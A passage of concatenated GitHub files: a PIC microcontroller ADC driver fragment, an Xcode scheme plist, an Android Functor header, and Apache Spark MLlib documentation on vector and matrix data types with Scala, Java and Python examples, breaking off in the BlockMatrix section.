0; while (!_AD1IF); _AD1IF = 0; while (!AD1CON1bits.DONE); //wait for conversion AD1CON1bits.ASAM = 0; //stop auto sampling AD1CON1bits.ADON = 0; return (ADC1BUF0)+(ADC1BUF1)+(ADC1BUF2)+(ADC1BUF3)+(ADC1BUF4)+(ADC1BUF5)+(ADC1BUF6)+(ADC1BUF7) +(ADC1BUF8)+(ADC1BUF9)+(ADC1BUFA)+(ADC1BUFB)+(ADC1BUFC)+(ADC1BUFD)+(ADC1BUFE)+(ADC1BUFF); } uint16 get_voltage(BYTE channel) { AD1CHS0bits.CH0SA = channel; //AN<channel> connected to CH0 AD1CON1bits.SAMP = 1; //start sampling while (!AD1CON1bits.DONE); return ADC1BUF0; } void setupADC10() { T5CONbits.TCKPS = 1; PR5 = ADC_DELAY - 1; TMR5 = 0x0000; T5CONbits.TON = 1; } void configureADC() { ANSELB = ANSELC = 0x0000; ANSELAbits.ANSA0 = 1; // Ensure AN0 is analog ANSELAbits.ANSA1 = 1; // Ensure AN1 is analog ANSELBbits.ANSB0 = 1; ANSELBbits.ANSB1 = 1; ANSELBbits.ANSB3 = 1; ANSELCbits.ANSC1 = 1; ANSELCbits.ANSC2 = 1; //URGENT! } void enableADCDMA() { AD1CON1bits.ADDMABM = 1; AD1CON4bits.ADDMAEN = 1; } void disableADCDMA() { AD1CON1bits.ADDMABM = 0; AD1CON4bits.ADDMAEN = 0; DMA0CONbits.CHEN = 0; }
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>SchemeUserState</key> <dict> <key>MZSelectableLabelDemo.xcscheme</key> <dict> <key>orderHint</key> <integer>0</integer> </dict> </dict> <key>SuppressBuildableAutocreation</key> <dict> <key>1FAA362C198FD105005FAD10</key> <dict> <key>primary</key> <true/> </dict> <key>1FAA3642198FD106005FAD10</key> <dict> <key>primary</key> <true/> </dict> </dict> </dict> </plist>
{ "pile_set_name": "Github" }
/* * Copyright (C) 2011 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifndef ANDROID_FUNCTOR_H #define ANDROID_FUNCTOR_H #include <utils/Errors.h> namespace android { class Functor { public: Functor() {} virtual ~Functor() {} virtual status_t operator ()(int what, void* data) { return NO_ERROR; } }; }; // namespace android #endif // ANDROID_FUNCTOR_H
{ "pile_set_name": "Github" }
--- layout: global title: Data Types - RDD-based API displayTitle: Data Types - RDD-based API --- * Table of contents {:toc} MLlib supports local vectors and matrices stored on a single machine, as well as distributed matrices backed by one or more RDDs. Local vectors and local matrices are simple data models that serve as public interfaces. The underlying linear algebra operations are provided by [Breeze](http://www.scalanlp.org/). A training example used in supervised learning is called a "labeled point" in MLlib. ## Local vector A local vector has integer-typed and 0-based indices and double-typed values, stored on a single machine. MLlib supports two types of local vectors: dense and sparse. A dense vector is backed by a double array representing its entry values, while a sparse vector is backed by two parallel arrays: indices and values. For example, a vector `(1.0, 0.0, 3.0)` can be represented in dense format as `[1.0, 0.0, 3.0]` or in sparse format as `(3, [0, 2], [1.0, 3.0])`, where `3` is the size of the vector. <div class="codetabs"> <div data-lang="scala" markdown="1"> The base class of local vectors is [`Vector`](api/scala/index.html#org.apache.spark.mllib.linalg.Vector), and we provide two implementations: [`DenseVector`](api/scala/index.html#org.apache.spark.mllib.linalg.DenseVector) and [`SparseVector`](api/scala/index.html#org.apache.spark.mllib.linalg.SparseVector). We recommend using the factory methods implemented in [`Vectors`](api/scala/index.html#org.apache.spark.mllib.linalg.Vectors$) to create local vectors. Refer to the [`Vector` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Vector) and [`Vectors` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Vectors$) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.{Vector, Vectors} // Create a dense vector (1.0, 0.0, 3.0). val dv: Vector = Vectors.dense(1.0, 0.0, 3.0) // Create a sparse vector (1.0, 0.0, 3.0) by specifying its indices and values corresponding to nonzero entries. val sv1: Vector = Vectors.sparse(3, Array(0, 2), Array(1.0, 3.0)) // Create a sparse vector (1.0, 0.0, 3.0) by specifying its nonzero entries. val sv2: Vector = Vectors.sparse(3, Seq((0, 1.0), (2, 3.0))) {% endhighlight %} ***Note:*** Scala imports `scala.collection.immutable.Vector` by default, so you have to import `org.apache.spark.mllib.linalg.Vector` explicitly to use MLlib's `Vector`. </div> <div data-lang="java" markdown="1"> The base class of local vectors is [`Vector`](api/java/org/apache/spark/mllib/linalg/Vector.html), and we provide two implementations: [`DenseVector`](api/java/org/apache/spark/mllib/linalg/DenseVector.html) and [`SparseVector`](api/java/org/apache/spark/mllib/linalg/SparseVector.html). We recommend using the factory methods implemented in [`Vectors`](api/java/org/apache/spark/mllib/linalg/Vectors.html) to create local vectors. Refer to the [`Vector` Java docs](api/java/org/apache/spark/mllib/linalg/Vector.html) and [`Vectors` Java docs](api/java/org/apache/spark/mllib/linalg/Vectors.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.linalg.Vector; import org.apache.spark.mllib.linalg.Vectors; // Create a dense vector (1.0, 0.0, 3.0). Vector dv = Vectors.dense(1.0, 0.0, 3.0); // Create a sparse vector (1.0, 0.0, 3.0) by specifying its indices and values corresponding to nonzero entries. Vector sv = Vectors.sparse(3, new int[] {0, 2}, new double[] {1.0, 3.0}); {% endhighlight %} </div> <div data-lang="python" markdown="1"> MLlib recognizes the following types as dense vectors: * NumPy's [`array`](http://docs.scipy.org/doc/numpy/reference/generated/numpy.array.html) * Python's list, e.g., `[1, 2, 3]` and the following as sparse vectors: * MLlib's [`SparseVector`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.SparseVector). * SciPy's [`csc_matrix`](http://docs.scipy.org/doc/scipy/reference/generated/scipy.sparse.csc_matrix.html#scipy.sparse.csc_matrix) with a single column We recommend using NumPy arrays over lists for efficiency, and using the factory methods implemented in [`Vectors`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Vectors) to create sparse vectors. Refer to the [`Vectors` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Vectors) for more details on the API. {% highlight python %} import numpy as np import scipy.sparse as sps from pyspark.mllib.linalg import Vectors # Use a NumPy array as a dense vector. dv1 = np.array([1.0, 0.0, 3.0]) # Use a Python list as a dense vector. dv2 = [1.0, 0.0, 3.0] # Create a SparseVector. sv1 = Vectors.sparse(3, [0, 2], [1.0, 3.0]) # Use a single-column SciPy csc_matrix as a sparse vector. sv2 = sps.csc_matrix((np.array([1.0, 3.0]), np.array([0, 2]), np.array([0, 2])), shape=(3, 1)) {% endhighlight %} </div> </div> ## Labeled point A labeled point is a local vector, either dense or sparse, associated with a label/response. In MLlib, labeled points are used in supervised learning algorithms. We use a double to store a label, so we can use labeled points in both regression and classification. For binary classification, a label should be either `0` (negative) or `1` (positive). For multiclass classification, labels should be class indices starting from zero: `0, 1, 2, ...`. <div class="codetabs"> <div data-lang="scala" markdown="1"> A labeled point is represented by the case class [`LabeledPoint`](api/scala/index.html#org.apache.spark.mllib.regression.LabeledPoint). Refer to the [`LabeledPoint` Scala docs](api/scala/index.html#org.apache.spark.mllib.regression.LabeledPoint) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.Vectors import org.apache.spark.mllib.regression.LabeledPoint // Create a labeled point with a positive label and a dense feature vector. val pos = LabeledPoint(1.0, Vectors.dense(1.0, 0.0, 3.0)) // Create a labeled point with a negative label and a sparse feature vector. val neg = LabeledPoint(0.0, Vectors.sparse(3, Array(0, 2), Array(1.0, 3.0))) {% endhighlight %} </div> <div data-lang="java" markdown="1"> A labeled point is represented by [`LabeledPoint`](api/java/org/apache/spark/mllib/regression/LabeledPoint.html). Refer to the [`LabeledPoint` Java docs](api/java/org/apache/spark/mllib/regression/LabeledPoint.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.linalg.Vectors; import org.apache.spark.mllib.regression.LabeledPoint; // Create a labeled point with a positive label and a dense feature vector. LabeledPoint pos = new LabeledPoint(1.0, Vectors.dense(1.0, 0.0, 3.0)); // Create a labeled point with a negative label and a sparse feature vector. LabeledPoint neg = new LabeledPoint(0.0, Vectors.sparse(3, new int[] {0, 2}, new double[] {1.0, 3.0})); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A labeled point is represented by [`LabeledPoint`](api/python/pyspark.mllib.html#pyspark.mllib.regression.LabeledPoint). Refer to the [`LabeledPoint` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.regression.LabeledPoint) for more details on the API. {% highlight python %} from pyspark.mllib.linalg import SparseVector from pyspark.mllib.regression import LabeledPoint # Create a labeled point with a positive label and a dense feature vector. pos = LabeledPoint(1.0, [1.0, 0.0, 3.0]) # Create a labeled point with a negative label and a sparse feature vector. neg = LabeledPoint(0.0, SparseVector(3, [0, 2], [1.0, 3.0])) {% endhighlight %} </div> </div> ***Sparse data*** It is very common in practice to have sparse training data. MLlib supports reading training examples stored in `LIBSVM` format, which is the default format used by [`LIBSVM`](http://www.csie.ntu.edu.tw/~cjlin/libsvm/) and [`LIBLINEAR`](http://www.csie.ntu.edu.tw/~cjlin/liblinear/). It is a text format in which each line represents a labeled sparse feature vector using the following format: ~~~ label index1:value1 index2:value2 ... ~~~ where the indices are one-based and in ascending order. After loading, the feature indices are converted to zero-based. <div class="codetabs"> <div data-lang="scala" markdown="1"> [`MLUtils.loadLibSVMFile`](api/scala/index.html#org.apache.spark.mllib.util.MLUtils$) reads training examples stored in LIBSVM format. Refer to the [`MLUtils` Scala docs](api/scala/index.html#org.apache.spark.mllib.util.MLUtils$) for details on the API. {% highlight scala %} import org.apache.spark.mllib.regression.LabeledPoint import org.apache.spark.mllib.util.MLUtils import org.apache.spark.rdd.RDD val examples: RDD[LabeledPoint] = MLUtils.loadLibSVMFile(sc, "data/mllib/sample_libsvm_data.txt") {% endhighlight %} </div> <div data-lang="java" markdown="1"> [`MLUtils.loadLibSVMFile`](api/java/org/apache/spark/mllib/util/MLUtils.html) reads training examples stored in LIBSVM format. Refer to the [`MLUtils` Java docs](api/java/org/apache/spark/mllib/util/MLUtils.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.regression.LabeledPoint; import org.apache.spark.mllib.util.MLUtils; import org.apache.spark.api.java.JavaRDD; JavaRDD<LabeledPoint> examples = MLUtils.loadLibSVMFile(jsc.sc(), "data/mllib/sample_libsvm_data.txt").toJavaRDD(); {% endhighlight %} </div> <div data-lang="python" markdown="1"> [`MLUtils.loadLibSVMFile`](api/python/pyspark.mllib.html#pyspark.mllib.util.MLUtils) reads training examples stored in LIBSVM format. Refer to the [`MLUtils` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.util.MLUtils) for more details on the API. {% highlight python %} from pyspark.mllib.util import MLUtils examples = MLUtils.loadLibSVMFile(sc, "data/mllib/sample_libsvm_data.txt") {% endhighlight %} </div> </div> ## Local matrix A local matrix has integer-typed row and column indices and double-typed values, stored on a single machine. MLlib supports dense matrices, whose entry values are stored in a single double array in column-major order, and sparse matrices, whose non-zero entry values are stored in the Compressed Sparse Column (CSC) format in column-major order. For example, the following dense matrix `\[ \begin{pmatrix} 1.0 & 2.0 \\ 3.0 & 4.0 \\ 5.0 & 6.0 \end{pmatrix} \]` is stored in a one-dimensional array `[1.0, 3.0, 5.0, 2.0, 4.0, 6.0]` with the matrix size `(3, 2)`. <div class="codetabs"> <div data-lang="scala" markdown="1"> The base class of local matrices is [`Matrix`](api/scala/index.html#org.apache.spark.mllib.linalg.Matrix), and we provide two implementations: [`DenseMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.DenseMatrix), and [`SparseMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.SparseMatrix). We recommend using the factory methods implemented in [`Matrices`](api/scala/index.html#org.apache.spark.mllib.linalg.Matrices$) to create local matrices. Remember, local matrices in MLlib are stored in column-major order. Refer to the [`Matrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Matrix) and [`Matrices` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.Matrices$) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.{Matrix, Matrices} // Create a dense matrix ((1.0, 2.0), (3.0, 4.0), (5.0, 6.0)) val dm: Matrix = Matrices.dense(3, 2, Array(1.0, 3.0, 5.0, 2.0, 4.0, 6.0)) // Create a sparse matrix ((9.0, 0.0), (0.0, 8.0), (0.0, 6.0)) val sm: Matrix = Matrices.sparse(3, 2, Array(0, 1, 3), Array(0, 2, 1), Array(9, 6, 8)) {% endhighlight %} </div> <div data-lang="java" markdown="1"> The base class of local matrices is [`Matrix`](api/java/org/apache/spark/mllib/linalg/Matrix.html), and we provide two implementations: [`DenseMatrix`](api/java/org/apache/spark/mllib/linalg/DenseMatrix.html), and [`SparseMatrix`](api/java/org/apache/spark/mllib/linalg/SparseMatrix.html). We recommend using the factory methods implemented in [`Matrices`](api/java/org/apache/spark/mllib/linalg/Matrices.html) to create local matrices. Remember, local matrices in MLlib are stored in column-major order. Refer to the [`Matrix` Java docs](api/java/org/apache/spark/mllib/linalg/Matrix.html) and [`Matrices` Java docs](api/java/org/apache/spark/mllib/linalg/Matrices.html) for details on the API. {% highlight java %} import org.apache.spark.mllib.linalg.Matrix; import org.apache.spark.mllib.linalg.Matrices; // Create a dense matrix ((1.0, 2.0), (3.0, 4.0), (5.0, 6.0)) Matrix dm = Matrices.dense(3, 2, new double[] {1.0, 3.0, 5.0, 2.0, 4.0, 6.0}); // Create a sparse matrix ((9.0, 0.0), (0.0, 8.0), (0.0, 6.0)) Matrix sm = Matrices.sparse(3, 2, new int[] {0, 1, 3}, new int[] {0, 2, 1}, new double[] {9, 6, 8}); {% endhighlight %} </div> <div data-lang="python" markdown="1"> The base class of local matrices is [`Matrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrix), and we provide two implementations: [`DenseMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.DenseMatrix), and [`SparseMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.SparseMatrix). We recommend using the factory methods implemented in [`Matrices`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrices) to create local matrices. Remember, local matrices in MLlib are stored in column-major order. Refer to the [`Matrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrix) and [`Matrices` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.Matrices) for more details on the API. {% highlight python %} from pyspark.mllib.linalg import Matrix, Matrices # Create a dense matrix ((1.0, 2.0), (3.0, 4.0), (5.0, 6.0)) dm2 = Matrices.dense(3, 2, [1, 2, 3, 4, 5, 6]) # Create a sparse matrix ((9.0, 0.0), (0.0, 8.0), (0.0, 6.0)) sm = Matrices.sparse(3, 2, [0, 1, 3], [0, 2, 1], [9, 6, 8]) {% endhighlight %} </div> </div> ## Distributed matrix A distributed matrix has long-typed row and column indices and double-typed values, stored distributively in one or more RDDs. It is very important to choose the right format to store large and distributed matrices. Converting a distributed matrix to a different format may require a global shuffle, which is quite expensive. Four types of distributed matrices have been implemented so far. The basic type is called `RowMatrix`. A `RowMatrix` is a row-oriented distributed matrix without meaningful row indices, e.g., a collection of feature vectors. It is backed by an RDD of its rows, where each row is a local vector. We assume that the number of columns is not huge for a `RowMatrix` so that a single local vector can be reasonably communicated to the driver and can also be stored / operated on using a single node. An `IndexedRowMatrix` is similar to a `RowMatrix` but with row indices, which can be used for identifying rows and executing joins. A `CoordinateMatrix` is a distributed matrix stored in [coordinate list (COO)](https://en.wikipedia.org/wiki/Sparse_matrix#Coordinate_list_.28COO.29) format, backed by an RDD of its entries. A `BlockMatrix` is a distributed matrix backed by an RDD of `MatrixBlock` which is a tuple of `(Int, Int, Matrix)`. ***Note*** The underlying RDDs of a distributed matrix must be deterministic, because we cache the matrix size. In general the use of non-deterministic RDDs can lead to errors. ### RowMatrix A `RowMatrix` is a row-oriented distributed matrix without meaningful row indices, backed by an RDD of its rows, where each row is a local vector. Since each row is represented by a local vector, the number of columns is limited by the integer range but it should be much smaller in practice. <div class="codetabs"> <div data-lang="scala" markdown="1"> A [`RowMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.RowMatrix) can be created from an `RDD[Vector]` instance. Then we can compute its column summary statistics and decompositions. [QR decomposition](https://en.wikipedia.org/wiki/QR_decomposition) is of the form A = QR where Q is an orthogonal matrix and R is an upper triangular matrix. For [singular value decomposition (SVD)](https://en.wikipedia.org/wiki/Singular_value_decomposition) and [principal component analysis (PCA)](https://en.wikipedia.org/wiki/Principal_component_analysis), please refer to [Dimensionality reduction](mllib-dimensionality-reduction.html). Refer to the [`RowMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.RowMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.Vector import org.apache.spark.mllib.linalg.distributed.RowMatrix val rows: RDD[Vector] = ... // an RDD of local vectors // Create a RowMatrix from an RDD[Vector]. val mat: RowMatrix = new RowMatrix(rows) // Get its size. val m = mat.numRows() val n = mat.numCols() // QR decomposition val qrResult = mat.tallSkinnyQR(true) {% endhighlight %} </div> <div data-lang="java" markdown="1"> A [`RowMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/RowMatrix.html) can be created from a `JavaRDD<Vector>` instance. Then we can compute its column summary statistics. Refer to the [`RowMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/RowMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.Vector; import org.apache.spark.mllib.linalg.distributed.RowMatrix; JavaRDD<Vector> rows = ... // a JavaRDD of local vectors // Create a RowMatrix from an JavaRDD<Vector>. RowMatrix mat = new RowMatrix(rows.rdd()); // Get its size. long m = mat.numRows(); long n = mat.numCols(); // QR decomposition QRDecomposition<RowMatrix, Matrix> result = mat.tallSkinnyQR(true); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A [`RowMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.RowMatrix) can be created from an `RDD` of vectors. Refer to the [`RowMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.RowMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg.distributed import RowMatrix # Create an RDD of vectors. rows = sc.parallelize([[1, 2, 3], [4, 5, 6], [7, 8, 9], [10, 11, 12]]) # Create a RowMatrix from an RDD of vectors. mat = RowMatrix(rows) # Get its size. m = mat.numRows() # 4 n = mat.numCols() # 3 # Get the rows as an RDD of vectors again. rowsRDD = mat.rows {% endhighlight %} </div> </div> ### IndexedRowMatrix An `IndexedRowMatrix` is similar to a `RowMatrix` but with meaningful row indices. It is backed by an RDD of indexed rows, so that each row is represented by its index (long-typed) and a local vector. <div class="codetabs"> <div data-lang="scala" markdown="1"> An [`IndexedRowMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix) can be created from an `RDD[IndexedRow]` instance, where [`IndexedRow`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.IndexedRow) is a wrapper over `(Long, Vector)`. An `IndexedRowMatrix` can be converted to a `RowMatrix` by dropping its row indices. Refer to the [`IndexedRowMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.distributed.{IndexedRow, IndexedRowMatrix, RowMatrix} val rows: RDD[IndexedRow] = ... // an RDD of indexed rows // Create an IndexedRowMatrix from an RDD[IndexedRow]. val mat: IndexedRowMatrix = new IndexedRowMatrix(rows) // Get its size. val m = mat.numRows() val n = mat.numCols() // Drop its row indices. val rowMat: RowMatrix = mat.toRowMatrix() {% endhighlight %} </div> <div data-lang="java" markdown="1"> An [`IndexedRowMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/IndexedRowMatrix.html) can be created from an `JavaRDD<IndexedRow>` instance, where [`IndexedRow`](api/java/org/apache/spark/mllib/linalg/distributed/IndexedRow.html) is a wrapper over `(long, Vector)`. An `IndexedRowMatrix` can be converted to a `RowMatrix` by dropping its row indices. Refer to the [`IndexedRowMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/IndexedRowMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.distributed.IndexedRow; import org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix; import org.apache.spark.mllib.linalg.distributed.RowMatrix; JavaRDD<IndexedRow> rows = ... // a JavaRDD of indexed rows // Create an IndexedRowMatrix from a JavaRDD<IndexedRow>. IndexedRowMatrix mat = new IndexedRowMatrix(rows.rdd()); // Get its size. long m = mat.numRows(); long n = mat.numCols(); // Drop its row indices. RowMatrix rowMat = mat.toRowMatrix(); {% endhighlight %} </div> <div data-lang="python" markdown="1"> An [`IndexedRowMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.IndexedRowMatrix) can be created from an `RDD` of `IndexedRow`s, where [`IndexedRow`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.IndexedRow) is a wrapper over `(long, vector)`. An `IndexedRowMatrix` can be converted to a `RowMatrix` by dropping its row indices. Refer to the [`IndexedRowMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.IndexedRowMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg.distributed import IndexedRow, IndexedRowMatrix # Create an RDD of indexed rows. # - This can be done explicitly with the IndexedRow class: indexedRows = sc.parallelize([IndexedRow(0, [1, 2, 3]), IndexedRow(1, [4, 5, 6]), IndexedRow(2, [7, 8, 9]), IndexedRow(3, [10, 11, 12])]) # - or by using (long, vector) tuples: indexedRows = sc.parallelize([(0, [1, 2, 3]), (1, [4, 5, 6]), (2, [7, 8, 9]), (3, [10, 11, 12])]) # Create an IndexedRowMatrix from an RDD of IndexedRows. mat = IndexedRowMatrix(indexedRows) # Get its size. m = mat.numRows() # 4 n = mat.numCols() # 3 # Get the rows as an RDD of IndexedRows. rowsRDD = mat.rows # Convert to a RowMatrix by dropping the row indices. rowMat = mat.toRowMatrix() {% endhighlight %} </div> </div> ### CoordinateMatrix A `CoordinateMatrix` is a distributed matrix backed by an RDD of its entries. Each entry is a tuple of `(i: Long, j: Long, value: Double)`, where `i` is the row index, `j` is the column index, and `value` is the entry value. A `CoordinateMatrix` should be used only when both dimensions of the matrix are huge and the matrix is very sparse. <div class="codetabs"> <div data-lang="scala" markdown="1"> A [`CoordinateMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.CoordinateMatrix) can be created from an `RDD[MatrixEntry]` instance, where [`MatrixEntry`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.MatrixEntry) is a wrapper over `(Long, Long, Double)`. A `CoordinateMatrix` can be converted to an `IndexedRowMatrix` with sparse rows by calling `toIndexedRowMatrix`. Other computations for `CoordinateMatrix` are not currently supported. Refer to the [`CoordinateMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.CoordinateMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.distributed.{CoordinateMatrix, MatrixEntry} val entries: RDD[MatrixEntry] = ... // an RDD of matrix entries // Create a CoordinateMatrix from an RDD[MatrixEntry]. val mat: CoordinateMatrix = new CoordinateMatrix(entries) // Get its size. val m = mat.numRows() val n = mat.numCols() // Convert it to an IndexRowMatrix whose rows are sparse vectors. val indexedRowMatrix = mat.toIndexedRowMatrix() {% endhighlight %} </div> <div data-lang="java" markdown="1"> A [`CoordinateMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/CoordinateMatrix.html) can be created from a `JavaRDD<MatrixEntry>` instance, where [`MatrixEntry`](api/java/org/apache/spark/mllib/linalg/distributed/MatrixEntry.html) is a wrapper over `(long, long, double)`. A `CoordinateMatrix` can be converted to an `IndexedRowMatrix` with sparse rows by calling `toIndexedRowMatrix`. Other computations for `CoordinateMatrix` are not currently supported. Refer to the [`CoordinateMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/CoordinateMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.distributed.CoordinateMatrix; import org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix; import org.apache.spark.mllib.linalg.distributed.MatrixEntry; JavaRDD<MatrixEntry> entries = ... // a JavaRDD of matrix entries // Create a CoordinateMatrix from a JavaRDD<MatrixEntry>. CoordinateMatrix mat = new CoordinateMatrix(entries.rdd()); // Get its size. long m = mat.numRows(); long n = mat.numCols(); // Convert it to an IndexRowMatrix whose rows are sparse vectors. IndexedRowMatrix indexedRowMatrix = mat.toIndexedRowMatrix(); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A [`CoordinateMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.CoordinateMatrix) can be created from an `RDD` of `MatrixEntry` entries, where [`MatrixEntry`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.MatrixEntry) is a wrapper over `(long, long, float)`. A `CoordinateMatrix` can be converted to a `RowMatrix` by calling `toRowMatrix`, or to an `IndexedRowMatrix` with sparse rows by calling `toIndexedRowMatrix`. Refer to the [`CoordinateMatrix` Python docs](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.CoordinateMatrix) for more details on the API. {% highlight python %} from pyspark.mllib.linalg.distributed import CoordinateMatrix, MatrixEntry # Create an RDD of coordinate entries. # - This can be done explicitly with the MatrixEntry class: entries = sc.parallelize([MatrixEntry(0, 0, 1.2), MatrixEntry(1, 0, 2.1), MatrixEntry(6, 1, 3.7)]) # - or using (long, long, float) tuples: entries = sc.parallelize([(0, 0, 1.2), (1, 0, 2.1), (2, 1, 3.7)]) # Create an CoordinateMatrix from an RDD of MatrixEntries. mat = CoordinateMatrix(entries) # Get its size. m = mat.numRows() # 3 n = mat.numCols() # 2 # Get the entries as an RDD of MatrixEntries. entriesRDD = mat.entries # Convert to a RowMatrix. rowMat = mat.toRowMatrix() # Convert to an IndexedRowMatrix. indexedRowMat = mat.toIndexedRowMatrix() # Convert to a BlockMatrix. blockMat = mat.toBlockMatrix() {% endhighlight %} </div> </div> ### BlockMatrix A `BlockMatrix` is a distributed matrix backed by an RDD of `MatrixBlock`s, where a `MatrixBlock` is a tuple of `((Int, Int), Matrix)`, where the `(Int, Int)` is the index of the block, and `Matrix` is the sub-matrix at the given index with size `rowsPerBlock` x `colsPerBlock`. `BlockMatrix` supports methods such as `add` and `multiply` with another `BlockMatrix`. `BlockMatrix` also has a helper function `validate` which can be used to check whether the `BlockMatrix` is set up properly. <div class="codetabs"> <div data-lang="scala" markdown="1"> A [`BlockMatrix`](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.BlockMatrix) can be most easily created from an `IndexedRowMatrix` or `CoordinateMatrix` by calling `toBlockMatrix`. `toBlockMatrix` creates blocks of size 1024 x 1024 by default. Users may change the block size by supplying the values through `toBlockMatrix(rowsPerBlock, colsPerBlock)`. Refer to the [`BlockMatrix` Scala docs](api/scala/index.html#org.apache.spark.mllib.linalg.distributed.BlockMatrix) for details on the API. {% highlight scala %} import org.apache.spark.mllib.linalg.distributed.{BlockMatrix, CoordinateMatrix, MatrixEntry} val entries: RDD[MatrixEntry] = ... // an RDD of (i, j, v) matrix entries // Create a CoordinateMatrix from an RDD[MatrixEntry]. val coordMat: CoordinateMatrix = new CoordinateMatrix(entries) // Transform the CoordinateMatrix to a BlockMatrix val matA: BlockMatrix = coordMat.toBlockMatrix().cache() // Validate whether the BlockMatrix is set up properly. Throws an Exception when it is not valid. // Nothing happens if it is valid. matA.validate() // Calculate A^T A. val ata = matA.transpose.multiply(matA) {% endhighlight %} </div> <div data-lang="java" markdown="1"> A [`BlockMatrix`](api/java/org/apache/spark/mllib/linalg/distributed/BlockMatrix.html) can be most easily created from an `IndexedRowMatrix` or `CoordinateMatrix` by calling `toBlockMatrix`. `toBlockMatrix` creates blocks of size 1024 x 1024 by default. Users may change the block size by supplying the values through `toBlockMatrix(rowsPerBlock, colsPerBlock)`. Refer to the [`BlockMatrix` Java docs](api/java/org/apache/spark/mllib/linalg/distributed/BlockMatrix.html) for details on the API. {% highlight java %} import org.apache.spark.api.java.JavaRDD; import org.apache.spark.mllib.linalg.distributed.BlockMatrix; import org.apache.spark.mllib.linalg.distributed.CoordinateMatrix; import org.apache.spark.mllib.linalg.distributed.IndexedRowMatrix; JavaRDD<MatrixEntry> entries = ... // a JavaRDD of (i, j, v) Matrix Entries // Create a CoordinateMatrix from a JavaRDD<MatrixEntry>. CoordinateMatrix coordMat = new CoordinateMatrix(entries.rdd()); // Transform the CoordinateMatrix to a BlockMatrix BlockMatrix matA = coordMat.toBlockMatrix().cache(); // Validate whether the BlockMatrix is set up properly. Throws an Exception when it is not valid. // Nothing happens if it is valid. matA.validate(); // Calculate A^T A. BlockMatrix ata = matA.transpose().multiply(matA); {% endhighlight %} </div> <div data-lang="python" markdown="1"> A [`BlockMatrix`](api/python/pyspark.mllib.html#pyspark.mllib.linalg.distributed.BlockMatrix) can be created from an `RDD` of sub-matrix blocks, where a sub-matrix block is a `((blockRowIndex, blockColIndex), sub-matrix)` tuple. Refer to the [`BlockMatrix` Python 